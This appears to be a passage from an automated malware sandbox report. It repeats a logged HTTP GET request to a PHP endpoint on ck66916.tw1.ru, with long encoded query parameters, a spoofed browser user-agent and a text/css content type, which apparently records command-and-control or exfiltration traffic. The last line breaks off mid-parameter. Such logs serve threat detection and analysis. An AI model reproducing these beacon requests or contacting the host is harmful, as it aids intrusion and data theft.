Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2